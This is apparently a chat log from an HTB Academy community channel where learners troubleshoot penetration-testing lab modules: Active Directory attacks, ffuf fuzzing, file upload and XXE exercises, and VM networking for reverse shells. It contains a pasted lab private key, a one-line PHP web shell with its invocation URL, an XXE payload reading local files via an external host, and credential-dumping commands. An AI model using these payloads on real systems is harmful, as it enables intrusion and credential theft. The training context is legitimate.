#modules

Alr bro here's a step by step guide. Copy the contents of the id_rsa file. Make a new file in your system and past it in there. You can add an extension like 'key" to it. Then chmod 600 that file. Finally ssh -i id_rsa user@ip

there's a reason i'm slowly walking through it instead of outright giving the answer

chmod: changing permissions of 'id_rsa': Operation not permitted

Don't worry it won't be enough

because you need to copy it to your system

oh

cat id_rsa then highlight and copy that to a file on YOUR system

and change the permissions there

also when you go to ssh as root, don't forget to include the port; as I recall this is on a docker instance with a public_ip:port

I do have a serious tip on this one, use file id_rsa after copy pasting to verify that you didn't miss a character

a better method is md5sum <file>

which gives a checksum value

note: new line at the end will change the md5sum value

Ah yes, good idea. I just want to verify that it's a valid rsa key but it's even better

it can be valid but sometimes (rarely) some text programs shuffle characters around

i've had it happen once, didn't modify my clipboard and it just... worked in a different text editor

what format

Weird

ssh root@83.136.255.167 -p55617 -i key

xd

did it work? 😄

it says wrong format

Lol

oh

😭

did you include the -----BEGIN and -----END lines?

those are important

begin?

there is no begin

You're logging into a public IP? Makes no sense

from the id_rsa file (not the id_rsa.pub) file

this section uses a public IP

Who runs ssh in port 55617 💀

For real? Ok

F9hwG/dmzqij4NiM7mxLrA2mcQO/oJKBoNvcmGXEYkSHqQysAti2XDisrP2Clzh5CjMfPu
DjIKyc6gl/5ilOSBeU11oqQ/MzECf3xaMPgUh1OTr+ZmikmzsRM7QtAme3vkQ4rUYabVaD
2Gzidcle1AfITuY5kPf1BG2yFAd3EzddnZ6rvmZxsv2ng9u3Y4tKHNttPYBzoRwwOqlfx9
PyqNkT0c3sV4BdhjH5/65w7MtkufqF8pvMFeCyywJgRL/v0/+nzY5VN5dcoaxkdlXai3DG
5/sVvliVLHh67UC7adYcjrN49g0S3yo1W6/x6n+GcgCH8wHKHDvh5h09jdmxDqY3A8jTit
CeTUQKMlEp5ds0YKfzN1z4lj7NpCv003I7CQwSESjVtYPKia17WvOFwMZqK/B9zxoxAAAA
wQC8vlpL0kDA/CJ/nIp1hxJoh34av/ZZ7nKymOrqJOi2Gws5uwmrOr8qlafg+nB+IqtuIZ
pTErmbc2DHuoZp/kc58QrJe1sdPpXFGTcvMlk64LJ+dt9sWEToGI/VDF+Ps3ovmeyzwg64
+XjUNQ6k9VLZqd2M5rhONefNxM+LKR4xjZWHyE+neWMSgELtROtonyekaPsjOEydSybFoD
cSYlNtEk6EW92xZBojJB7+4RGKh3+YNwvocvUkHWDEKADBO7YAAADBAPRj/ZTM7ATSOl0k
TcHWJpTiaw8oSWKbAmvqAtiWarsM+NDlL6XHqeBL8QL+vczaJjtV94XQc/3ZBSao/Wf8E5
InrD4hdj1FOG6ErQZns6vG1A2VBOEl8qu1r5zKvq5A6vfSzSlmBkW7XjMLJ0GiomKw9+4n
vPI0QJaLvUWnU/2rRm7mqFCCbaVl2PYgiO6qat9TxI2y7scsLlY8cjLjPp2ZobIZN5tu3Y
34b8afl+MxqFW3I5pjDrfi5zWkCypILwAAAMEAwDETdoE8mZK7wOeBFrmYjYmszaD9uCA/
m4kLJg4kHm4zHCmKUVTEb9GpEZr1hnSSVb+qn61ezSgYn3yvClGcyddIht61i7MwBt6cgl
ZGQvP/9j2jexpc1Sq0g+l7hKK/PmOrXRk4FFXk+j6l0m7z0TGXzVDiT+yCAnv6Rla/vd3e
7v0aCqLbhyFZBQ9WdyAMU/DKiZRM6knckt61TEL6ffzToNS+sQu0GSh6EYzdpUfevwKL+a
QfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==
-----END OPENSSH PRIVATE KEY-----

any section with a public IP will have an accompanying port that's the scope

you're missing the begin line

there is no begin line

also delete this as it's spoiler

Oops your ssh keys got leaked

Rip

yes, there should be

im catting it rn there is no begin line

scroll up

i am

dm me a picture

nothing there

Do you use a 400x400 screen?

There's no -- BEGINNING --- part

there should be a ----BEGIN line

son of a bitch deleted his begin line!

ill restart the vm

Why

maybe I deleted it by accident idk

No copy it again

its on my vm

From the box

No need of resetting anything

anyway

¯_(ツ)_/¯

you have the path to root now

the rest will just be skill issue

There's still no -- BEGIN part tho

¯_(ツ)_/¯

A typical ssh key should look like this: -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAA...
...
-----END OPENSSH PRIVATE KEY-----

you're missing way more lines

¯_(ツ)_/¯

Scroll up?

Press Page UP

try doing this /bin/bash -i

it seems like your terminal is not showing everything, your only seeing the 20th line to the end

well i just did it on my end and it showed the full thing

Manually add -----BEGIN OPENSSH PRIVATE KEY----- and see if it works...

it won't

he's missing far more lines than just that

Oh

now cat the file

Press enter on your keyboard about 10 time and send a screenshot of the terminal again

Oh your terminal is broken

You can't scroll up lol

yeah that's weird

close the terminal and reconnect

it seems it's only showing like 20 lines

yeah but ctrl-shift-c isn't copy in vim

Of yeah open that in a text editor

you'll need to highlight then press y

Nano?

¯_(ツ)_/¯

anyway

i'd have just closed and reopened the terminal

.

again

Yo terminal is broken

do my suggestion

close the terminal

and open a new one

it seems like you have some setting that's limiting also; btw you can press "full screen" to open a full screen tab of pwnbox

so you're not limited to a small window

Cool

¯_(ツ)_/¯

¯_(ツ)_/¯

I'd complete that part of I were you personally

¯_(ツ)_/¯

That's just me personally tho

Getting access and the thing you were doing

Or did you do it

loooooool

Oh cool

I need help pls. I'm in the Active Directory Enumeration & Attacks module. I am trying to answer this question: Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?
I don't know what to do to get that Web Config file.

well, it says run Snaffler. did you try that?

yeah but is not working

--unknown argument

is it target URL or target URI

this is from the module example

from the github

but --targetUrl isn't a valid option at all for Snaffler

ok the Snaffler devs earned my funny approval

Ok i did everything that says in the module, but i do not know how to look for the Web Config file

well that doesn't look like snaffler

the answer to the snaffler question will be in the snaffler output

so is the PW question after

Oh my bad. it says that the data need to be readable. i though i have to search it up in Bloodhound. Sorry lol

the data will be readable in the output :) (the snaffler output may also tell you where a file is to look at)

finally concluded, vfrank password was missing a character and got a tip from htb forum on where to pivot from 172.16.5.35!

as i said earlier, you were missing another host 😄

I was not able to spot that host running a loop in powershell.. not sure why and how I would find by myself...

Hi for the dataset on UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK [https://academy.hackthebox.com/module/218/section/2358]
Can someone from the support team or those that encountered it confirm if the executable that initiated a reverse shell to the attacker is
||demon.exe or notepad.exe||? Hence letting them execute commands on a later date via the ||randomfile.exe||?

Thanks i completed the section!

were you running the loop on the right interface?

Apparently yes, cause I found the other rabbit hole IP on the same subnet

Module: AD Enumeration & Attacks
In this section, it states:

It is worth noting this down because if we can take over this service account through some attack, we could use its membership in the Backup Operators group to take over the domain.
I haven't seen anything in this section or previous sections of this module that indicate having membership in the Backup Operators group could lead to taking over the domain. Is it saying it could potentially & indirectly lead to taking over the domain? Could someone please clarify? Thanks.

Maybe there's some information in the part where they enumerate detailed information about the group that indicates being part of the group could give permission to take over the domain?

I just did some research, is it because of the permissions this group inherently has that it could lead to taking over a domain?

If someone could confirm whether I've understood what they were trying to explain in the module's section I'd greatly appreciate it. Thanks!

backup operators can backup stuff and access sensitive files

https://www.thehacker.recipes/ad/movement/domain-settings/builtin-groups

bro said

Alrighty, so that's prolly why the section said what it said.

imagine using chrome

It's edge

even worse

Alright, alright, I'll download Firefox.

Eventually...

Out of curiosity which browser do you use?

firefox

LiberWolf

Wave browser, because I like the bundled adware in it

@summer swallow

https://academy.hackthebox.com/achievement/1343525/49

there we go!

kinda funny that MS blocks access to one of the best resources to AD/windows pentest

only for edge tho

All you can eat buffe

It is, I hadn't realized 😂

bro said buffe

GNU IceCat

i dont know how to spell that

"All you can eat"

There you go

oh !!!!! 😅

it's just @slender shoal

Hey, I am currently doing the InfoSec foundations path and just completed windows fundamentals. Next module is intro to windows command line and then bash scripting. But I am thinking to skip these two modules and going for the next module that is into to networking because my plan is to do first CBBH and then CPTS. And scripting would probably be of little to no help in CBBH afaik. Am I wrong ? Or this is fine ? Really confused which module to pick next.

I'd say do all the modules in the path, they're all pretty useful and will give you the basic knowledge needed for the other paths

okay.... Thanks, will do 🙂

@next bronze I just hit this section under the AD Enumeration & Attacks module. Under the PowerView subsection there's a table of the most useful PowerView functions. Are we expected to know all this? Or is there like a good reference? Or will bloodhound just do what I need?

I don't know whether it's worth including such a large table in my notes 💀

they're useful references, but it's up to you on whether to include them

How often does one actually use them though?

depends on how often you use powerview

Alrighty 😂

Btw do you know anything about Gitbook?

I'm making my notes using it, but a table of contents doesn't show for each page unless published. Is there a way to have a toc when the notes aren't published?

nope I don't use gitbook

Okay, thanks.

Can you give a hint to where you found the LINUX01$ Kerberos ticket?

I used a provided tool from the section. Requires root aswell iirc

Simmilar to mimikatz

Hello to all. I hope everybody is feeling awesome. I have some difficulty undetstanding how to create Jinja2 payloads through python instructions. This is part of SSTI example 3. it is indicated that we can go through different methods to be able to reach the method we need. But i dont understand how these are related. Any input is welcome 🙂

Hello!

Should i go through this issue ?! Or there is a missing pieces on the lab
Pivoting Tunneling and port forwarding
Socks5 tunneling with chisel

I tried to download the lib6 on my own and transferring it to the box and install it locally
Didn’t work tho

rdp sessions stays black...
terminated target and vm a few times...

@stiff urchin there is a note in the section that will help you out

worked😂

I got that flags earlier but wanna practice the tools

free robux

The lab is not broken

Yup, just ran linikatz, however, how did you know that you had to use the file located in /v**/l...............

Because I don't think there is anything pointing that I should use that file except that it starts with ccache

Well the question was asking me to get to linux01 user and in my linikatz output it pointed towards that file. Im currently working but i can send you a screenshot of the output once im home.

Maybe somewhere higher in the output?

Can i dm you? Don't want to spoil here

Yes. I can look at your output

Module: AD Enumeration & Attacks

Can someone explain the purpose of the parameter data to me in the following command?

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

This is the explanation provided in the section:

The -s tells it to print results to the console for us, the -d specifies the domain to search within, and the -o tells Snaffler to write results to a logfile. The -v option is the verbosity level. Typically data is best as it only displays results to the screen, so it's easier to begin looking through the tool runs.

check the tool's github page

there are different verbosity levels the tool supports

Anyone free that can assist me on the Broken Auth skill assessment

Oh, data is a verbosity level. Thanks! I checked out the GitHub page.

Hello, I'm on the "Attacking Enterprise Networks" Module and on the "Web Enumeration & Exploitation" section.
I would need the help from someone who has completed this module.
I'm trying to replicate the steps presented for ||the dev.inlanefreight.local VHOST, by adding the header found previously
but instead of retrieving the web page as seen on the module I get a "408 Request Timeout" Response.||
I have already tried to reset the environment multiple times but I always get the same result.
I also tried to change between the different VPN instances from EU/US and tried from the Pwnbox for both of the regions but it did not bear any fruits.
Does anyone encountered this problem ?

can someone clarify the difference between AS-REQroasting & AS-REP roasting cause this is not making any sense, they are practically the same

is it not the same?

request and reply

chatgpt says its not nd gave a bs explanation

The client request is called AS-REQ , the answer is called AS-REP . Client uses the TGT to ask the KDC for a ST (Service Ticket). That ticket is provided by the Ticket Granting Service (TGS). The client request is called TGS-REQ , the answer is called TGS-REP .
https://www.thehacker.recipes/ad/movement/kerberos

"AS-REQroasting" shouldnt even be a thing you're roasting the reply not the request

excatly

bro's tripping

I saw this in the HTB AD blog and its repeated again in this module, I assumed it was a typo in the blog

well from my knowledge they're the same, you need both a request and reply

https://www.hackthebox.com/blog/8-powerful-kerberos-attacks

alright, thanks man 🙏🏼

AS-REQ Roasting is possible when Kerberos pre-authentication is not configured. This allows anyone to request authentication data for a user. In return, the KDC would provide an AS-REP message.

Since part of that message is encrypted using the user’s password, it is possible to perform an offline brute-force attack to try and retrieve the user's password.

you'd still need asrep

this is hilarious btw, what a doozy

Its practically impossible without, the encrypted session key part is needed, problem is why some places call it AS-REQroasting and others call it AS-REProasting, and there is no consistency btween HTB sources.

But I'm just gonna ignore AS-REQroasting, thanks man ♥️

My brain literally exploded bro like wth

I just assume it's different names but mean the same thing

Hey guys.
On the "AD Enumeration & Attacks - Skills Assessment Part I" ||after i set up my socks_proxy and autoroute, i tried to use crackmapexec smb, but i always get :
SMB 172.16.6.50 445 NONE [*] x64 (name:) (domain:) (signing:False) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.6.50:445 ... OK
SMB 172.16.6.50 445 NONE [-] Connection Error: Error while reading from remote

Is this a connection issue on HTB side or am i doing something wrong?
I can RDP into the second host with proxychains, but cme doesnt seem to work.
I also reset the host once.||

even after loading module i can't get outupt of get-domainuser

2nd SKILL ASS of ad and enum

can you give me the output you get if you type Get-Module?

The powerview script is in not in the directory you're importing it from.
Use the full path or navigate there to use .\Powerview.ps1

oh shit it is

I've been getting a lot of these lately, shouldn't be a problem if the connection is stable but

the module is not loaded

use get-module to check if the module is loaded

but ||"proxychains crackmapexec smb IP -u user -p password --lsa"|| correct no?

yeah it's correct

looks good , just make sure ,you use the right proxy on the proxychains file

and use netexec

Yeah seems something with proxy and autoroute is wrong then

nah I'm saying I've been having problems with the academy vpn

bro , I use ligolo I don't have this kind of problems

so i do the classic reset the machine 3 times, wait a day and hope it gets better? 😄

I use ligolo and I've been having all kinds of problems

or contact the support

That never helped me with anything tbh :/

same

Hi there, thanks for reaching out. I'm XXX
​
Are you still facing this issue?

they reply after 16hr , till that time either problem is solved or not in mood to continue that shit again

they used to be fast like 2-3 hrs

hmm for me these lag and bug started from jan-feb

they were very fast in reply at that time but now 💀

https://tenor.com/view/dead-my-honest-reaction-damn-skull-skeleton-gif-15885937969029652188

Does anyone know why while the hashcat says the ntlmv2 hash was cracked but doesn't show the password? I looked both in the potfile and with the --show without showing a password.

what output are you getting?

hashcat -m mask hash.txt --show ?

I'm in the DNS footpriting module, I'm at the last question. I'm sure my command works after some research, it's the right brute force subdomain. But I have the impression that my wordlist is wrong. Any tips for me.

||$ sudo dnsenum --dnsserver 10.129.93.138 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt dev.inlanefreight.htb||

dude no french here

oh esxcude

hashcat -m 5600 hash.txt --show

looks good to me

yeah , what's the output you got

at the end of the hash I get this 003200340030000000000000000000:

Can you give the whole output?

its from skills assesment.. is it ok to share it here?

It was just the wordlist

gg

just put the ouptut so we can see what's happening

Good point, not sure 😄

I send it to you on PM

how to get perms to the general chat

#welcome

For the password attack lab- medium, after i got the D*.docx, what do i do next? i tried to read the content but it cant be read.

Hi guys, I am just solving HTB Academy 'Injectio attacks' module 'LPAD - Data exfiltration and blind exploitation'. I already got what i needed but the problem is if i submit the answer it shows me error. I tried upper and lower case, because in exercise it is not case sensitive. Then I tried even encoded space but no luck. Does anyone submit correct answer for this module ?

what you can do to read protected files ?

academy down ?

no

everything just stopped working for me suddenly

I just reloaded my viewer page and the module page

seems to be back now, but for like solid 4 minutes the ssh I got with the target was just stuck

maybe a computer hiccup

that does not necessarily reflect the underlying infrastructure, the web page could be up, but the labs down

and..... it's stuck again....

idk have you tried hitting it with hammer lol

hitting it with, spawning a new machine

do you think it would be the ping

lol

yeah ping showed crazy to me too like 1000000

mine is really high right now too

same deal with new machine, now I cannot even ping it anymore

now its down maybe switching to a different server

well, at least I know it's not just me

Having problems with connecting via SSH. I have done as specified but it returns with 'port 22: No route to host'
What am I doing wrong?

if you check the routing table on your attack box, does it show the HTB IPs ?

routing table?

have you tried switching locations for the pwnbox

no, does that usually work? i'll try it

I'm talk about the guy with the computer freezing

is the target machine turned on

im locked out now i dont have any spawns leftg

cant do anything

have you considered spinning up your own VM ?

yh i could

it's pretty easy and can even run with like 2gb ram and 1 cpu

kk cool

ya that's always fun

ill try that cheers

I figured out alr.

After running SharpHound using the folllowing command, my ZIP file was generated but some other .bin file was as well. Any idea what it is?

.\SharpHound.exe -c All --zipfilename ILFREIGHT

just google m8, it's the cache
https://posts.specterops.io/sharphound-evolution-of-the-bloodhound-ingestor-3b46643ccbd8?gi=d7efe7e17b76

I used BloodHound to list all the Kerberostable accounts, do I have to manually count them? Do I have to manually count the nodes on the screen? Is there a quicker way?

Oh okay, thanks 😅

@next bronze Any idea on this? I must be blind cuz I'm sure they must have it somewhere.

I read somewhere that there's a results tab that may show the number, but don't see one.

I have switched to Kali on my VM on my PC. I am getting the same problem, I am connected to Starting Point and the vpn is set up properly

idk what section it is but bh is not the only tool

It's this section, the first question has asked to do it using BH.

use Impacket-GetSPNusers | wc -l

Thanks for this. But do you know a way to do it using BH?

just count

I don't think it returns the number

imagine env with 300 kerberoastable users

lol

manually set SPN for everyone

alright im stuck at attacking web applications with ffuf
at subdomain fuzzing

i scan and i dont get any correct results

do i scan using a bigger list?or what
it says that the domains may not be public

oh shit wait

Ack! They upgraded Information Gathering - Web Edition and now I'm only half done with it after it had previously been completed.

O7

Maybe asking a third time's the charm.
Hello, I'm on the "Attacking Enterprise Networks" Module and on the "Web Enumeration & Exploitation" section.
I would need the help from someone who has completed this module.
I'm trying to replicate the steps presented for ||the dev.inlanefreight.local VHOST, by adding the header found previously
but instead of retrieving the web page as seen on the module I get a "408 Request Timeout" Response.||
I have already tried to reset the environment multiple times but I always get the same result.
I also tried to change between the different VPN instances from EU/US and tried from the Pwnbox for both of the regions but it did not bear any fruits.
Does anyone encountered this problem ?

You're not gonna get help with AEN

People do this module completely blind, as the module itself is the walk-through for it

I suggest reaching out to support to confirm its not just a skill issue

The problem I described is the only flag I can't retrieve I already finished the whole module

Still reach out to support. But if you were able to complete the rest of the module, skill issue

Skill issue while doing the exact same steps described in the module to get the flag ?

And being honest, it's best to just reach out to support

They'll confirm a lab error

How do I contact support ? Directly from discord or from the website ?

From the website

Green bubble on the bottom right

If you don't see it, disable adblock

408 is generally a network error

As it says "timed out"

marcie is big brain just trust

wait marcie your name is blue now??

GOOD SHIT MA BOY

Yeah I know that's why I tried from different VPNs of different regions, from both my box and the Pwnbox, etc...

I am having issues connecting to the SSH server in the Linux Fundamentals module. I have connected to the VPN, however the IP given does not connect and I can't ping it either. What do I do?

If you do ip a do you have a tun0 ip?

yes

Second did you run the openvpn command with sudo

yes

Are you connected to the right vpn

yes

Academy-regular.ovpn

yes that is the one

Is that also the ip given when you "Click here to spawn target!"?

yes

i thought you had to put your own IP?

The 10.129 ip

Do you have multiple tun IPs.

yes

If you do, sudo killall openvpn

k

Then rerun the command

k

Your issue was network collision, you had too many interfaces all trying to route the same way

Also terminate the pwnbox

thanks so much

im in

Struggling with this question:** After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.** I've installed Scrapy using pip3 and then ran ReconSpider.py but it's giving an error. Any ideas?

Stuck at File Upload Attacks Module Blacklist Filter Section.

I’m sure I uploaded the php file but can’t execute it

I don't see any errors

Ah at the bottom

You'd need to actually read the error to figure out where it broke

ValueError: Missing scheme in request url: inlanefreight.com

Weird I followed these instructions I wonder if its a problem with Scrapy

You need the http:// or https:// yeah, I'll update the command 😛

Then use http://

You broke it

Tbh though reading the error explains the error

python3 ReconSpider.py https://inlanefreight.com works fine thank you!

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

Didn't even need the staff clarification.

Idk if it's good or bad that I can read errors like that

very good

Tbh I've spent too many user error hours troubleshooting things

Hy...There is a problem with htb academy portal...The links for Modules and Paths are not working...Nothing happens on click...

Is it my browser or the portal...? 😆

Works on my end

It's strange...I tried firefox and chrome and the problem persists...

try disabling all plugins ¯_(ツ)_/¯

Thanks...It's the ad-blockers

It usually is

HTB doesn't serve ads btw

It's just some backend services get hit by the ad-blockers

http://SERVER_IP:PORT/profile_images/shell.phtml?cmd=id

Only get the php script at response

<?php system($_REQUEST['cmd']); ?>

did the vpn stop working suddenly for anyone else ?

yup, it's pretty bad alright

@pseudo kiln Yess me too

I just started one up

Pwnbox -> Academy just bricked for me as well (no connection), restarted both the pwnbox and challengebox multiple times

good to know, I was thinking of giving it a shot with the pwnbox too

changed servers too, so prob nothing else to do

Message support and keep an eye on https://status.hackthebox.com

im doing filtering results on attacking web applications with ffuf
ive executed
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:43588/ -H 'Host: FUZZ.academy.htb' -fs 900

but it doesnt find anything

Make sure you're filtering the right thing

Also make sure you have academy.htb in your /etc/hosts

oh lemme check

cat hosts
127.0.0.1 localhost
127.0.1.1 kali

damn

i edit it myself yeah?

Yes

alright

ip <domain> (don't include the brackets)

You don't include the port

do i use the ip:port as the academy.htb

oh alright

Just the ip

alright done

have i filtered somewhere wrong?or missed something

or both

I wouldn't attach a filter unless you know what you're filtering for

so i remove -fs

So run the command, see what the common response is, filter that out

alright

DAMN

It's that simple, as shown in the section

Now you should see what fs to filter for

You don't want the size that's flooding your screen

they used -fs 900 and found admin/
that confused me ngl

That's just an example

ah

Examples won't always be 1::1 to what you do, so you're not just copy/pasting commands

ye ofc

Gotta actually use your brain

They also explain why they used 900

ye
i thought it had something to do with -fs

It does

from the beginning

either way

When you fs, you're filtering (out) the response size you don't want to see

So it only shows results that you want to see

If you want to go a few extra steps, use a few curl commands to see what that response is

So you can see that it's "junk"

so i look at the size:
?

and filter that out or something

What is the common size you see when the ffuf command is running

I'm learning about XXE. To bypass XML's restriction on joining internal and external entities, we load an external DTD.
I wanted to try an alternative route (all of the entities being external) like so:

<!DOCTYPE email [
<!ENTITY begin SYSTEM "http://<ip>:8000/start">
  <!ENTITY file SYSTEM "file:///flag.php">
  <!ENTITY end SYSTEM "http://<ip>:8000/end">
  <!ENTITY joined "&begin;&file;&end;">
]>

On my machine:

$ cat start end
<![CDATA[
]]>

And using &joined; in the payload. Unfortunately, this does not work. Does anyone know why or if it could be made to work?
Logically it makes sense for this to work

986

So...

-fs 986

Try and see

Shit wait I got blue screen

Lmao fucking laptop

are you using nat or bridged?

NAT

Use bridged mode

Alright

well I give up for today, maybe tomorrow academy will fare better

alright i got it

ofc i would
im literally mr robot man

Chill

xd

do you know if it's possible to increase the size of a rdp session (xfreerdp)? I'm having a very bad time trying to read the screen 😅

Have you tried rdesktop?

It's a very very nice

I'll try it, thank you! (I was using xfreerdp)

Compared to xfreerdp, you may need to specify the domain for some cases in rdesktop. xfreerdp can sometimes infer the domain for you

anyone completed htb academy web info gathering updated ?

Xfreerdp has the /dynamic-resolution option

I'll take a look into that, thank you

I use it often

wow, I've tested it now, that's exactly what I wanted, thank you!!

It can also resolve the pesky black screen thing, when you resize the screen it redraws it and shows the corporate AUP screen

i need some help with question 3 in ACTIVE DIRECTORY ENUMERATION & ATTACKS Privileged Access.
Everytime I try to ssh to the 172.16.5.225 IP I get the error in the screenshot. I've looked at the solution and followed it but i still get this error.

The "S" after the password was added when i did the screenshot.

I've tried to reset the box but still the same..

my ping is over 9000

the information gathering update is great. just noticed it

Copy the pw to a notepad on the windows machine then copy it from there to the terminal, or use right-click paste

For w/e reason a regular paste doesn't work

Hi everyone! 🙂 I was wondering if anyone could sanity check me on the last question of the Kerberos Attacks Skill Assessment.

The user who I gained access to through the automation in the last step doesn't seem to have any privileges

Thanks I’ll give it a shot!😊

or isn't a part of any group thats important

I sanity checked this recently and it's odd, but not something HTB can realistically fix

why don't just ssh directly from your kali/pwnbox to the linux box?

Because you need to pivot

You can't access the linux box without being on the network, it's on a 172.16.x.x network, the vpn only gives you access to the 10.129.0.0/16 network

mmmm no, that kali box is another attack host you can use, you have direct access to a windows attack host and linux attack host, so you can test different tools to reach the same end

Yes but you'd still need the ip of the host to directly attach to

yes, you can. I've started my own lab just to test and it spawns 2 boxes

Ah so they did fix that

Used to not be the case where it would give you two IPs

Used to only give you the main box IP depending on what's needed for the section

I have tried to ssh from the windows box to the linux box and it accepted the credentials provided, @misty saddle have you checked the keyboard layout? maybe you're typing something different

Because when you ssh to the attack box from the ms01 box, if you did ip a it had a tun0 interface to directly connect with

Used to*

Glad they show both now

hi, i'm stuck in the linux fundamentals module in the "file descriptor and redirections" section and it's ask how many total packages are installed on the target system so I do the following command and i substract 1 to the first number but it doesn't worked

because you're not ssh to the target

and 2 the proper command would be wc -l

all of the questions are to be answered by ssh into the target "Click here to spawn target!"

Yes I am ssh to thé target

no, you're not

you're on the pwnbox

Mmh maybe I got disconnected and i didn't see it

i see in your screenshot us-academy-[number] half visible

btw you don't need to cut that part out

(sorry m'y english Is not perfect)

either way

you aren't ssh to htb-student@target_ip

Okay thanks you very much for your help, I try to learn linux and I'm not a pro so I didn't noticed that I wasn't connected to the target, thanks you

And I have an other question, I can't ssh to the target with an other machin, it work only with the pwnbox, Is it normal ?

you need to be connected to the VPN to connect with your own VM

as the IPs are on a private Subnet

Thanks you for helping

update: i can get a reverse shell but only on my host machine?? it works on my debian install but not my kali vm??? ???????

are you running the vpn on your host machine?

no

that is odd then, are you using NAT or bridged?

how do i find that out

it's network settings of your VM software like VirtualBox or VMWare

o

i'll dig around for that

but I doubt you can catch the shell on your host without it running the VPN

and not in your VM; are you sure you didn't run the VPN on your host by accident?

i mean like if i run the vpn and the browser with hackthebox on my host then it works, but the same configuration does not work on my vpn

wdym "and the browser with hackthebox"

ignore that part

like the in-browser VM?

nc works from my host machine but not the vm

can your VM reach the internet?

yes

did you turn off the VPN on your host when doing it in your VM?

yes

otherwise you're either explaining things poorly; or should reach out to support

since this is really weird

ok hold on

Use a different reverse shell

no it's a problem with my vm

i tried like 7 reverse shells and none worked and all of them worked on my host machine

Oh ok

sounds like your networking is messed up in your VM

Another reason why bare metal is better than VMs

¯_(ツ)_/¯

are you fucking kidding me

not an issue between baremetal and VM

simply an issue between keyboard and chair

everyone here spent a fuckin month convincing me to switch from bare metal to vm

ignore them

it's not a host issue

VM is fine

See that's just dumb

i use a VM; and i've had things work perfectly fine

Ye yeah...

marcie you were one of the people who convinced me to switch to vm

I'm suspecting that there's some networking thing in the background messing with things

yes i'm stating to ignore Candy because they're not helping your issue LMAO

ah ok yeah i'm gonna do that as well

I suggest restarting your system completely

then trying again

something tells me there's a background process that got stuck

exact same command both times, works on host machine, does not work on vm

I'm suspecting you still have the Host running openvpn

i don't

just

restart your system; and set it up again

ok my vm is using NAT, i guess i can try changing it

going to try restarting although i'm pretty sure i've tried already

do you have the listener even running to catch the shell?

look at the screenshots

i have the exact same setup in both screenshots

nvm just saw it

When you execute the reverse shell, does the page keep loading or does it finish loading?

the page should continuously try and load while it's running

when it works, it keeps loading, when it doesn't work, it stops loading

I mean if there's something wrong with your end the page should still keep loading

this may seem stupid

but remove the site from your /etc/hosts and just use the IP

as that's the only difference tbh

yeah i actually just thought of that

pretty much at the same time as you said it

guess i'll try it

Also your VM is in NAT or Bridged right?

i just changed it to bridged

i also changed another network setting that i don't remember

This is stupid to ask but have you actually tried pinging the target through your VM?

yeah it works fine

amazingly, none of the five things i tried worked

as usual
i have an issue
i find a ton of different fixes for it online
none of them work

While executing the reverse shell, open Wireshark and monitor any traffic from tbr target to your VM and see if there's traffic actually coming

https://tenor.com/view/works-on-my-machine-ryan-gosling-works-on-my-gif-24523830

try reinstalling the Kali VM (or install a new/fresh one) and see if it works then

if it does; there's an issue -- it could also be a weird firewall thing going on

I was about to say that

i don't think Kali has a firewall running by default

but you never know

Also just try runner netcat lister as sudo

i have

i guess i'll fuck around with the firewall

ufw should be disabled

Check if SELinux is on or not

I mean installed

completely disabling the firewall didn't work

am i just doomed to deal with this for the rest of my life? completely unfixable technical issues? constantly finding fixes and none of them ever working?

Did you monitor incoming traffic?

ok there is incoming traffic

that's a start i guess

Try re installing netcat?

have

i'm at a complete loss

Use metasploit to listen for the rev shell instead of netcat and see

Bruh just re install your VM at this point

i'm gonna lose so much shit

if reinstalling my vm doesn't work i am going to, without exaggeration, cancel my academy subscription and give up on cybersecurity entirely

because i've been dealing with the exact same shit for years
technical issues, 10 fixes online, 0 work
god does not want me to get a career in IT

i'm genuinely at a complete loss as to why this does not stop happening to me

It's not specifically to you lol chill...

i've never met anyone else with this problem

Errors are common... You just move forward finding ways to solve them

that's what i've been trying to say for the last 15 minutes
i DO NOT move forward finding ways to solve them, i literally never fucking solve them

But yeah since metasploit doesn't work I am 90% sure something is terribly fucked up with yoir VM

do you think i mean i'm the only person who gets technical issues?

Nah

i might reach out to htb staff tomorrow

Ok

tbh if you get this frustrated, it's probably for the best ngl. you gotta be prepared to fight through the "it's so over"

to hit the "We're so back"

yeah metasploit not working means something is really wrong

i can't even remember the last time i hit the "we're so back"

how long are you spending per day, out of curiosity

depends on the day

on work days, anywhere from 0-2ish hours

on average

on days off closer to 12

Facts

yeah then I get the frustration of the 2 hours you get that little bit of time to work on it and it doesn't work

it spent 12 hours not working last time i spent 12 hours on it

but tbh I suggest taking a bit of a break from it, and coming back at a later time

i just now tried using pwnbox but i can't even figure out how to get it to work

i.e. shelving it for a few days or a week. Let your brain mentally reset your frustration

You do not have the exact same setup. One screenshot shows you connecting via hostname, the other is IP.

yeah we went over this, changing that didn't work

There are time where I've had to completely re install my entire system multiple times bc of errors I can't figure out. It might be skill issue but these sorts of stuff is extremely common in this field

pwnbox is just an in-browser Parrot VM

yeah i know it just kept bugging out

sounds like maybe a driver issue then on your end

if it's "bugging out"

as I've had no issues using it when i've needed to

it's clearing a networking issue, so we would need to see how the vm's network is setup to assist. what hypervisor are you using?

virtualbox

Is ur host Linux?

i have no experience setting that up since i use the superior vmware, but if you can show the network manager config we may be able to help.

this is a tomorrow me issue
i give up for the night

pwnbox is bugging out

yes their host is linux

their prior screenshot shows this

if your vm can reach the internet, it should be able to reach htb's servers. i wouldn't recommend bridge mode though, NAT is the way I connect.

NAT can cause issues

well NAT and bridged both did not work

i've only ever had issues with bridged

if i can fuckin get pwnbox to work at all then i'm going to try it on pwnbox and if it works on pwnbox then it's something horribly wrong with my vm

well your host is having issues even using the Pwnbox

That probably is the issue 90%

pwnbox is bugging out on windows as well

works fine on my machine

also define "Bugging out"

that's not really helpful

